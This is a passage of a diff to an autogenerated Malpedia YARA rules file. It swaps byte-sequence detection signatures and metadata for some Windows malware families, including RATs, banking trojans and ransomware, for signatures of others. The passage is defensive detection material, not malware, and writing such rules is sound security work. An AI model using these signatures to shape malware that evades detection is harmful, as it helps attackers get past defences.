c68424ba00000078 c68424bb00000078 c68424bc00000078 c68424bd00000078 c68424be00000000 488d8c24a0000000 } - $sequence_4 = { 48894c2408 4883ec48 48837c246001 752b } - $sequence_5 = { c6442420fb c6442421fc c6442422fe c6442423ff c6442424aa c64424254d } - $sequence_6 = { c68424020100006d c684240301000000 c684240401000007 c68424050100006d c68424060100004f c684240701000072 } - $sequence_7 = { 89442428 837c242800 7c3a 8b442448 39442428 7d30 8b442420 } - $sequence_8 = { 7417 488b442450 488b4c2448 4803c8 488bc1 } - $sequence_9 = { 48837c242800 7509 488d05d8250000 eb22 488d542420 488b4c2428 ff15???????? } + $sequence_0 = { f5 f8 0fb7bc79b0010000 81fa00000001 0f833a000000 3b45fc 0f83c3fc0100 } + $sequence_1 = { 8b44242c 8b4804 894c2428 8b4a04 894c2430 8b08 8b02 } + $sequence_2 = { e8???????? 807e053d 8944240c 8d4340 754b 89e9 bafe00008d } + $sequence_3 = { 891c24 e8???????? c744240401000000 891c24 e8???????? 85c0 7518 } + $sequence_4 = { f9 663bc9 33d8 03f8 e9???????? 8b442500 660fbdd5 } + $sequence_5 = { f8 f5 03f8 e9???????? ff742500 055a2dd112 8dad04000000 } + $sequence_6 = { 89442408 8b4510 89442404 8b03 890424 e8???????? 8b550c } + $sequence_7 = { f6c3d8 2dc4275e67 2bce 660fc8 66d3c0 fec8 8d440aa4 } + $sequence_8 = { e9???????? 8b4c2500 80c4f7 d2d8 648b01 89442500 81ee04000000 } + $sequence_9 = { c7442404ffffffff 891c24 e8???????? 8974240c 89442408 c7442404???????? 891c24 } condition: - 7 of them and filesize <107520 + 7 of them and filesize <6438912 } -rule MALPEDIA_Win_Tidepool_Auto : FILE +rule MALPEDIA_Win_Fuxsocy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "736615ac-754a-59af-859e-d31c5da8062a" + id = "acae4e77-3091-5877-bdf5-d5242a4de3aa" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tidepool_auto.yar#L1-L265" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fuxsocy_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "6d671b94ab0cdccf8b9683ef25d1220e65648f34328ff5e4475983ab8ad7951c" + logic_hash = "7715515075d3596588ef1486b8f0b7f8a98d13af15afc29c2d4231048e4e16d8" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -151526,51 +154353,32 @@ rule MALPEDIA_Win_Tidepool_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 50 8b08 ff91a4000000 } - $sequence_1 = { 8b4df4 64890d00000000 59 5f 5e 5b 8b8d00030000 } - $sequence_2 = { 8b8d00030000 33cd e8???????? 81c504030000 } - $sequence_3 = { 83c404 8bc6 5e c20400 80790800 } - $sequence_4 = { 53 6a02 8bf1 e8???????? } - $sequence_5 = { 6800000040 8d4500 50 ff15???????? } - $sequence_6 = { 2bc8 83e906 51 83c006 50 } - $sequence_7 = { e8???????? 83c40c 803d????????37 7518 68???????? } - $sequence_8 = { 8b4654 8d9698000000 52 8d5678 8b08 } - $sequence_9 = { 52 50 8b08 ff91f8000000 85c0 } - $sequence_10 = { 8b4654 50 8b08 ff5138 } - $sequence_11 = { 8d5658 52 50 ff91d0000000 33ff } - $sequence_12 = { c3 56 8bf1 e8???????? 8b4654 } - $sequence_13 = { 8d45ec 50 681f000200 53 } - $sequence_14 = { 6810270000 ff15???????? 8b45ec 8b08 } - $sequence_15 = { 681f000200 56 68???????? 6801000080 } - $sequence_16 = { 75f9 b8???????? b900000400 c60000 40 49 } - $sequence_17 = { e8???????? 68???????? 68???????? 68???????? 8d4500 } - $sequence_18 = { 57 50 6802020000 ff15???????? 68???????? ff15???????? } - $sequence_19 = { 8bc6 5e 5b c20400 6a14 68???????? } - $sequence_20 = { 6805400080 e8???????? 8b542424 52 53 } - $sequence_21 = { 33c9 8aea 83c003 83c504 } - $sequence_22 = { ff75ec ff15???????? 8b35???????? 6a04 } - $sequence_23 = { 83651400 8b07 83c40c 837d0c00 0f8ed1000000 8b4d08 41 } - $sequence_24 = { 8bec 8b4508 56 833c850811011000 } - $sequence_25 = { 50 ff7508 ff15???????? 395dfc 53 } - $sequence_26 = { 50 8d4604 50 e8???????? 8d45e0 6a04 } - $sequence_27 = { 50 89450c ff15???????? 53 ff75fc ff75f8 } - $sequence_28 = { 8365ec00 8945f4 8d3dd8e30010 8b45f4 d1e0 03f8 } + $sequence_0 = { 72f0 8bcf e8???????? 5f 5e 5d ff74240c } + $sequence_1 = { 8b4e08 890491 ff06 eb02 891e 5b 5f } + $sequence_2 = { 6689442420 8d442422 53 50 894c2420 885c2413 895c2418 } + $sequence_3 = { 85c0 7426 68???????? 68???????? ff15???????? 50 ff15???????? } + $sequence_4 = { 6804010000 8d85ccfdffff 50 ff15???????? 68???????? 8d85ccfdffff 50 } + $sequence_5 = { e8???????? 59 59 eb4b 807e0200 7404 85db } + $sequence_6 = { c745f808020000 ff15???????? 85c0 753d 8d85e8fdffff 50 } + $sequence_7 = { 33f6 ff15???????? 8bc8 e8???????? 85c0 7426 68???????? } + $sequence_8 = { 68???????? 50 8d54241c 8d4c2424 e8???????? 83c40c 83c310 } + $sequence_9 = { 50 ff74241c 33c9 ff74242c 41 c744242c32000000 c744246804000000 } condition: - 7 of them and filesize <1998848 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Bka_Trojaner_Auto : FILE +rule MALPEDIA_Win_Ratankbapos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a0a20d3c-b939-5a5e-b947-ecd1e3a9e77c" + id = "5159f055-afb3-5653-8c2e-8b4cd00d6051" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bka_trojaner_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ratankbapos_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "b96818656a5fc18803f0bf1dba8c00052206b33d8bd6ff1c085aa051852c2a47" + logic_hash = "307bbc2928c4233a295ed19557340191e5f9ae029ac3d7d89bb25a026e5ae32e" score = 75 quality = 75 tags = "FILE" @@ -151584,32 +154392,32 @@ rule MALPEDIA_Win_Bka_Trojaner_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 2bc1 33ff 89442428 397c2420 894c2438 897c242c } - $sequence_1 = { 8b542414 68ff030000 8d8c2468040000 03da 8b54241c 51 } - $sequence_2 = { 50 57 e8???????? 85c0 75c6 5d } - $sequence_3 = { 56 ff5124 85c0 7517 8b44247c 5f } - $sequence_4 = { 85c0 7439 53 8b1d???????? 55 8b2d???????? 8bff } - $sequence_5 = { 8b54240c 8b4c2404 8b8170ffffff 52 8b54240c 81c170ffffff 52 } - $sequence_6 = { 6a10 68???????? 68???????? 52 ff15???????? 83c8ff } - $sequence_7 = { e8???????? 59 59 8945c4 a1???????? } - $sequence_8 = { c7440a04???????? 8b4104 8b4004 8d9078ffffff 891408 8b4104 } - $sequence_9 = { 752d 837df800 7424 ff7508 8d4608 e8???????? ff7508 } + $sequence_0 = { 8d542444 56 52 e8???????? 8d44244c 83c424 33d2 } + $sequence_1 = { 83c424 33d2 8d7001 8d4900 8a08 40 3acb } + $sequence_2 = { 897304 8d7901 90 8a01 41 84c0 } + $sequence_3 = { 8b4b0c 03f0 c68405fcdfffff00 8d85fcdfffff 89b5f4dfffff c6040e00 } + $sequence_4 = { e8???????? 8b4510 33c9 8a4801 8d14cdd8ea0010 } + $sequence_5 = { ffb7c03d0110 ff15???????? 8987c03d0110 83c704 83ff28 72e6 5f } + $sequence_6 = { ff15???????? 83c41c 8bf0 ff15???????? 50 } + $sequence_7 = { 8b4dfc 33cd 83c408 b001 } + $sequence_8 = { b801000000 894588 8945a4 33c9 8bc2 c78574ffffff3c000000 } + $sequence_9 = { 8bc8 c1f905 8d3c8de04d0110 8bf0 } condition: - 7 of them and filesize <221184 + 7 of them and filesize <327680 } -rule MALPEDIA_Win_Quickmute_Auto : FILE +rule MALPEDIA_Win_Rapid_Ransom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3ebd5405-d3fe-5b1c-9991-79b28ea4d116" + id = "ffd06a30-064b-5d5c-9708-094ba6b3f858" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickmute" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.quickmute_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rapid_ransom_auto.yar#L1-L164" license_url = "N/A" - logic_hash = "94d7bee668e9656185345d12aa56e27e4c1baa2644d60d5f43d4b597af8c5206" + logic_hash = "467069894b412bd66ec7bc5db00e763aed4734a1d880a5b3cc4cb8b392b71ec1" score = 75 quality = 75 tags = "FILE" @@ -151623,32 +154431,37 @@ rule MALPEDIA_Win_Quickmute_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 ff15???????? 50 ff15???????? 5f c3 } - $sequence_1 = { 750c 8d4dd8 51 56 } - $sequence_2 = { 8d55c0 52 56 ffd7 a3???????? 833d????????00 c6854cffffff54 } - $sequence_3 = { 8d9578edffff 52 6a03 ff15???????? 3bc3 745c } - $sequence_4 = { 885dae 391d???????? 750c 8d4da8 } - $sequence_5 = { 56 68???????? ff15???????? 83c408 8b751c } - $sequence_6 = { 7510 53 6a40 ff15???????? 53 } - $sequence_7 = { c7459030002900 c7459420006c00 c7459869006b00 c7459c65002000 } - $sequence_8 = { 6a00 50 8946f8 ff15???????? } - $sequence_9 = { c78542ffffff63746f72 66c78546ffffff7957 c68548ffffff00 750f } + $sequence_0 = { 50 6801000004 6800a40000 ff75f8 } + $sequence_1 = { 83ec10 53 56 57 8bf9 32db 8bf2 } + $sequence_2 = { 83ec1c 53 57 8bf9 8bc2 } + $sequence_3 = { ff15???????? 6a00 ff75f8 ff15???????? 5e 5f 8ac3 } + $sequence_4 = { 7509 803a00 0f840c010000 8d742464 b8???????? 84db } + $sequence_5 = { 56 8bf2 8975fc 57 8bf9 85db } + $sequence_6 = { e8???????? 83c430 8d45f4 6800010000 } + $sequence_7 = { 7425 ff7514 8b542418 8bce ff7510 c644241701 57 } + $sequence_8 = { 0f8483000000 eb7d 8b1c9df8584100 6800080000 } + $sequence_9 = { 740e 50 e8???????? 83a6e8d0410000 59 83c604 } + $sequence_10 = { 8be5 5d c3 ff75e0 e8???????? 53 e8???????? } + $sequence_11 = { eb72 8d04cd00000000 2bc1 46 8935???????? c6048564d3410001 893c856cd34100 } + $sequence_12 = { 6804010000 8d85a4feffff 8bf1 6a00 50 } + $sequence_13 = { 40 c745ecf54e4000 894df8 8945fc 64a100000000 8945e8 } + $sequence_14 = { 83c9ff c7430c01000000 c7431000000000 eb2f } condition: - 7 of them and filesize <146432 + 7 of them and filesize <286720 } -rule MALPEDIA_Win_Badflick_Auto : FILE +rule MALPEDIA_Win_Chinoxy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "24a1778a-a3eb-561a-a408-849c5f96759c" + id = "916e0861-f860-58c8-9808-fcfac5c4f41d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.badflick_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chinoxy_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "416482f46b00136f041d59b3fa9a5b2a608db531874355803fb74761c46fd686" + logic_hash = "eeb7ce09274161abdb807fd23b8c72ae21763a7e3cd9b91cd84dd2d99cf4e640" score = 75 quality = 75 tags = "FILE" @@ -151662,32 +154475,32 @@ rule MALPEDIA_Win_Badflick_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 74e2 6800800000 53 ff75f8 ff75e4 ff15???????? } - $sequence_1 = { 56 ff75fc ff15???????? 53 ff15???????? 33c0 5f } - $sequence_2 = { 8d4598 53 50 c7459044000000 895d94 e8???????? 33c0 } - $sequence_3 = { 8bec 51 51 8b4d0c 8b4101 53 56 } - $sequence_4 = { 68???????? 50 ffd7 be???????? 56 } - $sequence_5 = { 8945fc ffd6 8bf0 8d85e8fcffff 50 } - $sequence_6 = { 5d c3 b001 c3 55 8bec } - $sequence_7 = { 50 8b4704 03450c 50 8b47fc 0345f8 } - $sequence_8 = { 85c0 0f85e7000000 6a01 ff7305 } - $sequence_9 = { ff750c e8???????? 50 e8???????? 59 59 56 } + $sequence_0 = { 8d4704 50 ff15???????? 8d8e90200000 c744241800000000 e8???????? 85c0 } + $sequence_1 = { 8d842424010000 50 e8???????? 8b9318040000 8d8c2428010000 51 52 } + $sequence_2 = { 2bcd c1e013 c1ef0d 0bc7 03ee 33c1 8bf8 } + $sequence_3 = { 897e18 8b4c2410 895e10 895e14 8bc6 5f 5e } + $sequence_4 = { e8???????? 85c0 741f 668b4c242c 6a08 66894802 50 } + $sequence_5 = { 8b8ef0000000 8d86e8000000 3bc8 c744241c00000000 7405 394004 7538 } + $sequence_6 = { 8d4c2410 6689542414 66895c2424 6689542430 66895c2438 66895c245c } + $sequence_7 = { 8d8ec8020000 e8???????? 8d86d4020000 8b4c240c 894004 894008 c700???????? } + $sequence_8 = { 894b10 03f2 8bd1 8bf8 c1e902 f3a5 8bca } + $sequence_9 = { 17 08cb 8291975b9c2acc 8f81509c02d5 96 9e 664e } condition: - 7 of them and filesize <81920 + 7 of them and filesize <1138688 } -rule MALPEDIA_Win_C0D0So0_Auto : FILE +rule MALPEDIA_Win_Unidentified_074_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7fd27b52-4a26-50f0-a471-2ac29e8cd05c" + id = "0d21a50a-0481-57c8-ac0f-f7fe46c9359f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.c0d0so0_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_074_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "80f1d1736e25190b04ddf50f3339fde0073091aa1984fb16860f6c3d691cdb86" + logic_hash = "e6b5821f00996c51a196dd1c4d62a76bb0e0925ea653a38d0c3db163875f48e7" score = 75 quality = 75 tags = "FILE" @@ -151701,32 +154514,32 @@ rule MALPEDIA_Win_C0D0So0_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 895dfc 8975f4 ff15???????? ff75f8 } - $sequence_1 = { 7404 0006 eb02 2806 0fb6c0 03d0 03f0 } - $sequence_2 = { 807e0d00 c6460801 7469 8b460e 8b1d???????? 8365f800 83c012 } - $sequence_3 = { 53 8b5f04 c745f401000000 0f86f4000000 56 8bb080000000 6a14 } - $sequence_4 = { 83c204 83f914 7ceb 8bc7 8b4dfc 33cd } - $sequence_5 = { 752c 6a01 56 e8???????? 59 59 } - $sequence_6 = { 50 33ff ff15???????? 8d4598 50 ff15???????? } - $sequence_7 = { ff7334 ffd6 8945fc 85c0 } - $sequence_8 = { 3acb 75f6 8bc7 5f 5e } - $sequence_9 = { 33ff 53 47 e8???????? 59 eb0b 56 } + $sequence_0 = { 50 ffb578dfffff e8???????? 33c0 c7858cdfffff07000000 c78588dfffff00000000 66898578dfffff } + $sequence_1 = { 50 e8???????? 6aff 6a01 83ec08 c745fc00000000 8d4dd8 } + $sequence_2 = { 3bc1 7432 8b4d08 8d041e 8a0408 3a02 7516 } + $sequence_3 = { 50 ff15???????? 8bf0 85f6 0f84c4010000 837f1000 } + $sequence_4 = { 50 899d6cdfffff c78568dfffff00000000 660fd645e4 e8???????? } + $sequence_5 = { c78524e7ffff07000000 66898510e7ffff 8d85f8e6ffff 50 8d8540e7ffff c78520e7ffff00000000 50 } + $sequence_6 = { 8d4e01 8a06 46 84c0 75f9 8d4588 } + $sequence_7 = { e8???????? 83c40c 019dc4feffff 8b85c4feffff } + $sequence_8 = { 83ec08 8845f0 8d45f0 50 e8???????? 884435e8 } + $sequence_9 = { 8d8d70e7ffff 6a12 33c0 c78584e7ffff07000000 } condition: - 7 of them and filesize <450560 + 7 of them and filesize <335872 } -rule MALPEDIA_Win_Maoloa_Auto : FILE +rule MALPEDIA_Win_Vmzeus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c9cb938f-8aed-56a4-9406-4a70e3564e5d" + id = "6aa23f59-07e5-5545-b355-8ded6d796e51" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maoloa_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vmzeus_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "aa3156b629c721039014b4e703faa79f34b5d8a33e4caf3d82f64b9729ae8335" + logic_hash = "cf57c567165f41d1d66d4120ec9208acf9ea89868aae72faa87074d6a7fc07a0" score = 75 quality = 75 tags = "FILE" @@ -151740,32 +154553,32 @@ rule MALPEDIA_Win_Maoloa_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b55fc 8bcb 85c0 7817 8d45f0 50 e8???????? } - $sequence_1 = { 50 ffb5f0e4ffff 8b35???????? ffd6 8b85c0e4ffff c1e015 03858ce5ffff } - $sequence_2 = { 8b4df8 33cd e8???????? 8be5 5d c3 befcffffff } - $sequence_3 = { 83c404 85f6 0f8590000000 6a01 8bd7 8bcf e8???????? } - $sequence_4 = { 85c0 8d8d00e0ffff 0f45ce 8bf1 89b5f8dfffff 8d85f8efffff 50 } - $sequence_5 = { b910000000 0f43c1 8d4c2418 2bf8 } - $sequence_6 = { 8d97a9cfde4b 33c1 894db4 0345d0 03d0 8b7db4 c1c20b } - $sequence_7 = { 8bd3 c707ffffffff 8bcf e8???????? 83c404 8bf0 8b85e0f9ffff } - $sequence_8 = { 0f1f00 0fb601 8d4901 30440eff 0fb641ff 30440aff 83ef01 } - $sequence_9 = { 5e 5b 8be5 5d c3 8d45f0 8bd1 } + $sequence_0 = { e9???????? 32c0 6a4c 8d7c242c 59 f3aa } + $sequence_1 = { 32c0 6a4c 8d7c242c 59 f3aa } + $sequence_2 = { 6a04 58 e9???????? 32c0 6a4c 8d7c242c 59 } + $sequence_3 = { 6a10 32c0 59 8bfb } + $sequence_4 = { f3a4 b001 eb02 32c0 5f 5e } + $sequence_5 = { 32c0 6a4c 8d7c242c 59 } + $sequence_6 = { 6a10 32c0 59 8bfb f3aa } + $sequence_7 = { 58 e9???????? 32c0 6a4c } + $sequence_8 = { f3a4 b001 eb02 32c0 5f } + $sequence_9 = { e9???????? 32c0 6a4c 8d7c242c } condition: - 7 of them and filesize <586752 + 7 of them and filesize <475136 } -rule MALPEDIA_Win_Zeus_Action_Auto : FILE +rule MALPEDIA_Win_Cryptolocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "65e8f438-ad6b-5cc2-8433-22cd51967cfc" + id = "ef7778bc-4b3f-57b9-be94-b68bbd4e0a82" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeus_action_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptolocker_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "d578cc91c04661eaf2cc2ee8b8d1f82a11b119d1521d38f5e03bfba5cd5d37a6" + logic_hash = "308de5ca9cd2927cd67ef4efc7cb0917b58e872fb565dc9ff1066d1520a7dec9" score = 75 quality = 75 tags = "FILE" @@ -151779,34 +154592,34 @@ rule MALPEDIA_Win_Zeus_Action_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 668945fa 8d75f4 a5 a5 a5 8383d87500000c 33f6 } - $sequence_1 = { 7417 8b01 57 51 ff5034 8b4de8 85c9 } - $sequence_2 = { ff15???????? b800080000 663b05???????? 7510 e8???????? 84c0 7407 } - $sequence_3 = { 894508 3bf0 7433 8d7b14 85f6 7504 33c0 } - $sequence_4 = { 0f84d0020000 395df8 0f84c7020000 395df4 0f84be020000 395dd0 0f84b5020000 } - $sequence_5 = { 49 3bc6 7509 8b7dd8 894de8 } - $sequence_6 = { 59 85c0 0f8479010000 837ddc00 740f 53 e8???????? } - $sequence_7 = { 83c0fb 83f803 7740 f745d000080000 7416 03f9 03d9 } - $sequence_8 = { 50 8b4618 83c004 50 ff15???????? 8b761c 83c40c } - $sequence_9 = { ff15???????? 85c0 7817 56 8d85f8fdffff 50 8d85f0fbffff } + $sequence_0 = { 8d4a9f 6683f905 770f c1e004 } + $sequence_1 = { 0f858f000000 a1???????? 85c0 7509 } + $sequence_2 = { 898431ecfeffff 8b4ee8 85c9 740e 8b01 } + $sequence_3 = { ff7720 56 ff15???????? 8b4510 8b4b04 5f 5e } + $sequence_4 = { 7405 83f802 7549 85c9 } + $sequence_5 = { 8b75fc 33c9 85c0 0f48f1 7522 85f6 781e } + $sequence_6 = { c20800 55 8bec 83ec08 53 56 8b7508 } + $sequence_7 = { 8b4ee8 85c9 740e 8b01 6a01 8b4004 03c8 } + $sequence_8 = { 55 8bec 56 8b750c 8d8600ffffff 83f801 7723 } + $sequence_9 = { 0fb7044a 83f820 740f 83f809 7205 83f80d } condition: - 7 of them and filesize <827392 + 7 of them and filesize <778240 } -rule MALPEDIA_Win_Tinynuke_Auto : FILE +rule MALPEDIA_Win_Greenshaitan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d780fd7f-583b-590f-a92f-7ac4fac52f1d" + id = "d06953fb-38e3-55db-9793-3faef3649e6a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinynuke_auto.yar#L1-L294" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.greenshaitan_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "f182ca1cbc1a4db59bec12699d68404bb9da6364ccc0407277f19ab284be21eb" + logic_hash = "67bf6d74e4d0fa44058834ba5470ffb949ca80488520bfdf122c691ce2d70d18" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -151818,54 +154631,32 @@ rule MALPEDIA_Win_Tinynuke_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c3 55 8bec 817d0c00040000 } - $sequence_1 = { 6aff ff7508 6a00 68e9fd0000 ff15???????? 8bc3 5b } - $sequence_2 = { 7625 53 8b5d08 57 8b7d10 57 } - $sequence_3 = { ff35???????? a3???????? 57 ff15???????? ff35???????? 8b7dfc } - $sequence_4 = { 50 56 57 ff35???????? c745f801000000 } - $sequence_5 = { 8d8530f6ffff 50 6802020000 ff15???????? 85c0 } - $sequence_6 = { 8945f4 8d85d4feffff 50 ff15???????? } - $sequence_7 = { 6a03 53 53 6800000080 50 ff15???????? a3???????? } - $sequence_8 = { ff75ec ff75fc e8???????? 83c40c 5f } - $sequence_9 = { ff15???????? ff35???????? 8d85a4feffff 50 } - $sequence_10 = { 8d85a4feffff 50 ff15???????? ff35???????? } - $sequence_11 = { ff15???????? a3???????? ff35???????? ff75f8 } - $sequence_12 = { a3???????? 68e2010000 68???????? 68???????? e8???????? } - $sequence_13 = { e8???????? eb18 83f803 7519 } - $sequence_14 = { 59 a3???????? c9 c3 55 } - $sequence_15 = { 6a2a 50 8945fc ff15???????? } - $sequence_16 = { a3???????? ff35???????? ff75ec ff15???????? } - $sequence_17 = { 8a00 3c0a 7409 3c0d } - $sequence_18 = { 50 8d85f0fdffff 50 ff15???????? ff75fc 8d85f0fdffff } - $sequence_19 = { ff15???????? 8d85d0fcffff 50 e8???????? 59 } - $sequence_20 = { ff15???????? 8b35???????? 8d430c 50 } - $sequence_21 = { 8b0f 85c9 742a 8d440b02 85c9 } - $sequence_22 = { 8b44241c 8bb0a0000000 2b6834 01de 8b16 85d2 } - $sequence_23 = { 8bb90000e06e 0f848e000000 83fa20 0f84f0000000 83fa08 0f84b4000000 } - $sequence_24 = { 890424 89442418 e8???????? 89c3 } - $sequence_25 = { ffd6 57 53 ffd6 5f 5e 8bc3 } - $sequence_26 = { 8b06 85c0 75b7 8b7c241c 8b8780000000 } - $sequence_27 = { c744240840000000 891c24 89dd 8944240c 8b442418 89442404 e8???????? } - $sequence_28 = { 745c 01d8 890424 e8???????? 83ec04 89c6 } - $sequence_29 = { a1???????? 83c014 03c7 894df8 8945f4 7417 } - $sequence_30 = { 03c7 83f864 0f873f010000 8b45c0 8b7dbc } - $sequence_31 = { c744241000000000 c744240c50c30000 c744240850c30000 c744240400000000 e8???????? } + $sequence_0 = { 8b460c 8d542434 52 50 } + $sequence_1 = { 6a00 51 50 b940000000 e8???????? 8bf0 eb02 } + $sequence_2 = { 81ce00ffffff 46 8a1c0e 881c0f 88040e 8d4201 99 } + $sequence_3 = { 8b442444 8b4c2440 8b7c243c 50 51 8d542418 52 } + $sequence_4 = { e8???????? 85ed 740c 8b4500 eb09 8b4500 8bc8 } + $sequence_5 = { 51 ff15???????? 8b8c240c200000 5e 5d } + $sequence_6 = { 0fb69b685b6e00 8819 0fb6d2 8bda c1eb04 c1e004 0bd8 } + $sequence_7 = { 8bc8 ebe1 33c0 397814 770e 85ed 7405 } + $sequence_8 = { 33f6 8bc5 99 6a00 52 c644244400 50 } + $sequence_9 = { 720d 8b542434 52 e8???????? 83c404 c784248c000000ffffffff 897c2448 } condition: - 7 of them and filesize <1196032 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Netsupportmanager_Rat_Auto : FILE +rule MALPEDIA_Win_Dexter_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cef2dd3b-0f7d-59a7-a048-7ced175e981a" + id = "5ebe4c09-da98-582c-8eed-df32a16fd066" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.netsupportmanager_rat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dexter_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "79986ba5845ddb197c2cbb664d974c015a806cc2574092a014c092c0439de61a" + logic_hash = "88383a20a07c3308fad4494ea352148cf37f604e3e0c05d6e635ee453d38e768" score = 75 quality = 75 tags = "FILE" @@ -151879,32 +154670,32 @@ rule MALPEDIA_Win_Netsupportmanager_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8b7df0 3bfb c745fcffffffff 7410 8bcf e8???????? } - $sequence_1 = { f3a4 8d4dfc 51 e8???????? 83c404 663dffff 668945dc } - $sequence_2 = { e8???????? 8bcb e8???????? 8b4510 8b08 894b34 8b5004 } - $sequence_3 = { ff15???????? 85ff 7417 8b1b 81e7ffff0000 6a00 57 } - $sequence_4 = { c644020400 e8???????? 8b8558ffffff 83c404 85c0 7514 8b9550ffffff } - $sequence_5 = { e8???????? 8b9750030000 52 e8???????? 8b450c 8b7510 83c408 } - $sequence_6 